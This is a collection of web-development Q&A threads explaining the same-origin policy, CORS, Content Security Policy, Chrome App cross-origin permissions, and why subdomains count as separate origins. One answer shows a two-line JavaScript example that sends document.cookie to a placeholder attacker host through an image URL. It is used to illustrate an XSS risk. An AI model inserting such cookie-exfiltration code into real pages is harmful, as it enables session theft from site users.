I am planning a Chrome App project where I will be performing numerous AJAX calls. Before settling on Chrome Apps as platform of choice, I would like to have a better understanding of its limitations and advantages regarding AJAX calls compared to web apps. Having conducted some research, I came up with the answers below. Since I have limited experience in this area, I would like to know if my findings are correct and if there are other limitations that should be considered.
1. Origin
Limitations regarding origins are more flexible for Chrome Apps than for web apps: The same-origin policy related to AJAX requests can be relaxed in the app’s manifest by requesting cross-origin permissions. Therefore, there is no need for techniques like Cross-Origin Resource Sharing (CORS) and JSONP (which is in fact prohibited by the Content Security Policy (CSP)).
2. Content
Limitations regarding accessible content are more severe: Chrome Apps can only refer to scripts, stylesheets, images, frames, plugins and fonts within the app, but media resources (video, audio, and associated text tracks) can be loaded from any external resource. The ‘connect-src’ directive is set to allow for loading any URI, so given cross-origin permissions or using CORS, one can make AJAX calls to all hosts and receive text and media type responses. Other content types can be served as blobs. The CSP can not be relaxed.
(A peculiarity I found: As stated, CSP forbids loading several content types, therefore one has to load them as blobs via AJAX requests. As a result of the same-origin policy, this would have to be done via CORS. Most servers don’t have CORS enabled, even if their content is public. Therefore, if Chrome Apps enforced ‘Access-Control-Allow-Origin’ (ACAO) response headers at all times, the CORS approach would fail in a lot of cases.
The solution to this problem is cross-origin permissions: If a permission was given to access a server, even if no appropriate ACAO header is received, the request is let through. But one can rely on CORS alone too: If no cross-origin permission is granted, but the request is made to a server with wildcard ACAO settings, it is also let through.)
Two additional things to note:
Some documentation of Chrome Apps refers to extensions instead of
apps. In these cases I assume that the information provided there is
correct for apps too.
Synchronous XHR requests are disabled.
Unfortunately, you'll just have to test this all out. I've found the Google docs (especially with Chrome apps) to be very lacking and frequently wrong. Going through the docs, it appears they wrote them for extensions, copied all the docs over and then when they encountered a difference, they changed the docs but did not cover everything.
As for accessing external sources, follow these "instructions":
http://developer.chrome.com/apps/app_external.html#external
And if you find an issue, report it BOTH here and https://code.google.com/p/chromium/issues/list
Related
Modern browsers prevent scripts fetching RSS feeds from sites out of the domain of the running script.
The RSS feed gets transmitted but the browser's Same Origin Policy won't let you access it.
Only feeds from servers that specify the CORS Access-Control-Allow-Origin header can be read.
Why?
We are not talking about malicious scripts - just XML data.
What is the thinking behind considering an RSS feed as a potential danger?
How could it be exploited?
Only feeds from servers that specify the CORS Access-Control-Allow-Origin header can be read.
so all major web-browsers implement a blanket block just so that insecure servers don't leak otherwise publicly available feeds? Still does not make much sense to me.
By default, the Same-Origin Policy won't let a client read the response to a cross-origin request, regardless of whether the requested resource is publicly accessible. CORS is a protocol for the server to instruct a browser to selectively relax some of the Same-Origin Policy's restrictions (both in terms of reading and sending) on network access to a resource from some requesting client.
There's nothing special about an RSS feed. In the case you describe, it's just one cross-origin resource among others. Carving out an exception for RSS feeds in the SOP would have needlessly complicated it.
The RSS can still be downloaded using a download manager or even wget. That does not make any sense.
True, but the SOP was never meant as a substitute for server-side access control; for one thing, it's only enforced in browsers, not in other user agents like curl or Postman. Rather, the SOP is meant to protect Web origins from one another.
why is RSS data considered dangerous?
We are not talking about malicious scripts - just XML data. What is the thinking behind considering an RSS feed as a potential danger? How could it be exploited?
You've got it backwards. The SOP's restrictions on network access are not meant to defend the client against a malicious resource. Instead, they're meant to defend the resource against a malicious cross-origin client, which might for example attempt to exfiltrate data from the resource.
If you control the resource in question, you can override the default behaviour of browsers and configure CORS to allow clients from any Web origin to read the response from the requested resource.
ajax preceded CORS by several years. Ajax W3C Standard 2006; CORS W3C Standard 2014. I know I was programming way back then!
Support for cross-origin requests with AJAX only came later than 2006, prompting the need to devise the CORS protocol. See XMLHttpRequest Level 2, W3C Working Draft 25 February 2008:
XMLHttpRequest Level 2 enhances XMLHttpRequest with new features, such as cross-site requests [...]
(my emphasis)
Note that "cross-site" should be understood as "cross-origin", here. The difference matters now that "site" has a more technical meaning.
Besides, CORS support was added to major browsers in the later 2000s. It didn't wait until the 2014 W3C standard.
First a big thanks to all the commenters and to #jub0bs for his considered and detailed answer. You all gave me a lot of food for thought.
However it has since dawned on me that XML data such as RSS can embed text that contains <script> tags and those tags, once fetched, might be inadvertently inserted verbatim (using innerHTML or similar DOM methods) - and this would be equivalent to any other Cross-site script (XSS) exploit.
So RSS should be considered dangerous.
The remedy according OWASP is not to use innerHTML when incorporating fetched data.
So I deployed all of my React apps that are using an API. I am having problems sending this api and something block them and so my apps aren't working.
Note: all of my requests are cors so there is no problem with them.
github block my request
and this is link to the project in picture news-blog
The problem is that you're trying to fetch non-secure (http) content from a secure (https) site, which violates the site's Content-Security-Policy (CSP). This is an insecure behavior as far as modern browsers are concerned.
From MDN:
The HTTP Content-Security-Policy response header allows web site administrators to control resources the user agent is allowed to load for a given page. With a few exceptions, policies mostly involve specifying server origins and script endpoints. This helps guard against cross-site scripting attacks (XSS).
The right way of solving this would be to load the data from a secure source. For example, instead of fetching from http://newsapi.org/v2/everything, try https://newsapi.org/v2/everything (note the difference between http and https).
I spend some time to understand how Cross-Origin-Resource-Sharing works, and I cannot believe how this could be designed so insecure.
When a website hosted on foo.com wants to request a resource which is stored at bar.com via ajax, the browser asks bar.com if the request is allowed.
Only if bar.com explicitly allows asynchronous requests from foo.com (via the Access-Control-Allow-Origin response header), the resource is delivered to the client.
It´s not a security problem if data should be read. But if data is sent to the requested server, it is.
In the past, if a hacker successfully inserted JavaScript code in a website to steal cookie data or other informations, the Same-Origin-Policy
prevented that he could send the informations to his own server directly.
But thanks to CORS, a hacker can directly send the stolen information to his own server just by enabling any origin.
I know, CORS is still under development, but already supported by almost all major browsers. So, why is CORS designed like this? Wouldn´t it be much more secure, if the originating server is asked for permission to send ajax requests?
In my oppinion, this is a degradation of security. Or is it not?
All "known issues" I found related to CORS are about weak configuration on the requested server.
The same-origin policy is designed purely to prevent one origin from reading resources from another origin. The side effect you describe -- preventing one origin from sending data to another origin -- has never been part of the same-origin policy's purpose.
In fact, sending data to another origin has never been prohibited, ever, from the very beginnings of the Web. Your browser sends cross-origin requests all the time: any time it encounters a cross-origin <img>, <script>, <iframe>, etc. The same-origin policy simply restricts scripts' ability to read these resources; it has never restricted the browser's ability to fetch them and show them to the user.
Consider the following code:
var img = document.createElement("img");
img.src = "http://evil.example.com/steal?cookie=" + document.cookie;
This creates:
<img src="http://evil.example.com/steal?cookie=SESSION=dfgh6r...">
which will send cookie data to evil.example.com when it is added to the page's DOM. The same-origin policy has never, ever prevented this kind of behavior.
If you are interested in whitelisting origins that your page is allowed to send data to, you want a content security policy, which was designed explicitly as an XSS mitigation mechanism.
CORS wasn't designed for this security problem.
For this problem you mention, you need to prevent the site from executing arbitrary javascript. You want, more specifically, to prevent :
scripts loaded from a non white-listed origin
scripts directly in the page (as attribute or in a <script> element)
For that, we use the Content-Security-Policy header which can for example be set to "script-src 'self'" (meaning that only scripts loaded from an external file in the same origin can be executed).
Any website with not trivial generated content should have this header set but unfortunately this might be hard to handle in old frameworks as this adds very strong restrictions.
See http://en.wikipedia.org/wiki/Content_Security_Policy
I'm intending to add security for our Javascript code which gets embedded on other sites - eg: like analytics code.
The user copies 4-5 lines of the code and puts it on his site. The code actually downloads the real script as the next step.
I have been recommended to use CORS instead of the current JSONP calls as I can restrict the domains.
As I understand, the CORS would work only if the html page which will add my scripts needs to add access domains and if I add the access domains for the the js file, it wouldn't work.
Is the CORS for the final js or the html page intending to use my script?
Edit:
Since it's confusing to the users, I have made it more simple.
HTML in domain A adds my script from Domain B like Google analytics. Can I add access-domains: while rendering my JS or should the HTML add the access-domains in the response?
There is a good explanation from wiki for this question:
CORS can be used as a modern alternative to the JSONP pattern. While JSONP supports only the GET request method, CORS also supports other types of HTTP requests. Using CORS enables a web programmer to use regular XMLHttpRequest, which supports better error handling than JSONP. On the other hand, JSONP works on legacy browsers which predate CORS support. CORS is supported by most modern web browsers. Also, while JSONP can cause cross-site scripting (XSS) issues where the external site is compromised, CORS allows websites to manually parse responses to ensure security.
As I understand, the CORS would work only if the html page which will add my scripts needs to add access domains
You can access all domains via:
Access-Control-Allow-Origin: *
Also now CORS has good support.
P.S. IE8-9 has own imlementation by XDomainRequest.
CORS works by having your server output the Access-Control-Allow-Origin header containing the allowed domains. The sites that make ajax requests to your server don't need to do anything special to enable CORS, there is no configuration required. The sites just simply make normal XHR requests and the browser will internally handle the CORS.
You control the CORS access from the header on your server. In CORS, you can also control the HTTP verbs that are allowed, for example POST or GET (Access-Control-Allow-Methods) or the permitted request headers (Access-Control-Allow-Headers).
Note that IE8 doesn't support the CORS XHR, Microsoft decided to create their own CORS implementation with XDomainRequest. So if any of the sites that call your server want to support IE8, they will need to use XDomainRequest instead of XMLHttpRequest. There is no support for CORS in IE7 or eariler - not even XDomainRequest.
I have a site where I'm developing my REST endpoints on:
https://prefixone.somesite.com
And I have another site where I'm developing my UI Framework:
https://prefixtwo.somesite.com
I can successfully login and get a 200 response in IE. In FF and Chrome, I get a "405 METHOD NOT ALLOWED". Chrome sheds more light on the situation by saying "XMLHTTPRequest cannot load XXXXXXXXXXX. Origin xxxxxxxxxxx is not allowed by Access-Control-Allow-Origin.
Both of the sites are on somesite.com
Does this situation still qualify as XSS?
Your question is "why would I still receive a 405 even though both url's are form XXXX.com?", but in fact, your URLs are NOT from the same domain.
xxx.yyyy.com and zzz.yyyy.com are not the same domain. They may share a significant part of their names, but they are not the same.
This is because it is perfectly possible for the owner of subdomains within a domain to be operated by entirely independent people. Consider uk.com. The owner of this domain sells the third-level domains within it as a competitor to the standard British country-level domain co.uk.
The sites at xxx.uk.com and zzz.uk.com are completely different sites, and you would not expect the former to be able to load content from the latter without violating the same origin policy rules.
The browser has no knowledge of which domains would do this and which wouldn't, so it plays it safe and assumes that any two subdomains could be operated by different people.
Even yyyy.com and www.yyyy.com are not considered the same thing.
I hope that answers your question.
As for what to do about it....
1) Put everything on the same subdomain. The most common reason for splitting a site across multiple subdomains is for performance, but unless you're operating Google or Facebook, it's unlikely to be critical to your performance, and there a probably other things you could do first that would be more helpful. Also, the new SPDY protocol (soon to evolve into HTTP v2) will render the technique obsolete.
2) If you must split it across multiple subdomains, you might want to look into using a crossdomain.xml file, which you can place on each server, to give them explicit permissions to access each other's content.
Basically in your code you need to run the following in JavaScript:
document.domain = "somesite.com";
This will tell the browser that the part that should matter, for the purposes of the Same Origin Policy, is somesite.com not the prefixed part.
Look up "document domain" on Google for more.
the same origin policy restricts this. And as the name implies it works with origins, not domains. An origin is a full domain name + protocol + port number. So even two pages running on the same host cannot communicate if they are on different ports or protocols.
If you plan to support only newer browsers look at adding x-access-control headers.
If you need to support older browsers look at something like easyXDM.